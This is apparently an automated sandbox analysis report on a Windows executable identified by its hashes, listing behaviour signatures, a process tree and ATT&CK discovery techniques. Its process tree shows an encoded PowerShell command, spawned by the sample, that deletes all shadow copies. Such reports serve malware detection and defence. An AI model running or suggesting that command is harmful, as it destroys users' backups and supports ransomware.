Analysis

  • max time kernel
    146s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 01:33

General

  • Target

    93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe

  • Size

    4.5MB

  • MD5

    be059dd5f3442f498bde97f69265ccbd

  • SHA1

    28a8eae3633023961f3bcc3d473b0aa1943676c4

  • SHA256

    93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7

  • SHA512

    493de3059a33e9ce8bcf67dfea31af6525764917729aeb7705eec20ab78eae3d216ddc6d9d4bebcbf7fa7748e92aa4efa1f0dbcd4e67c142c8c33a317c7c421d

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
    "C:\Users\Admin\AppData\Local\Temp\93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:832
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1680
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1376
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2004

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/832-54-0x0000000075891000-0x0000000075893000-memory.dmp
      Filesize

      8KB

    • memory/1680-55-0x000007FEFBE91000-0x000007FEFBE93000-memory.dmp
      Filesize

      8KB

    • memory/1680-56-0x0000000002850000-0x0000000002852000-memory.dmp
      Filesize

      8KB

    • memory/1680-58-0x0000000002852000-0x0000000002854000-memory.dmp
      Filesize

      8KB

    • memory/1680-59-0x0000000002854000-0x0000000002857000-memory.dmp
      Filesize

      12KB

    • memory/1680-57-0x000007FEF3460000-0x000007FEF3FBD000-memory.dmp
      Filesize

      11.4MB

    • memory/1680-60-0x000000000285B000-0x000000000287A000-memory.dmp
      Filesize

      124KB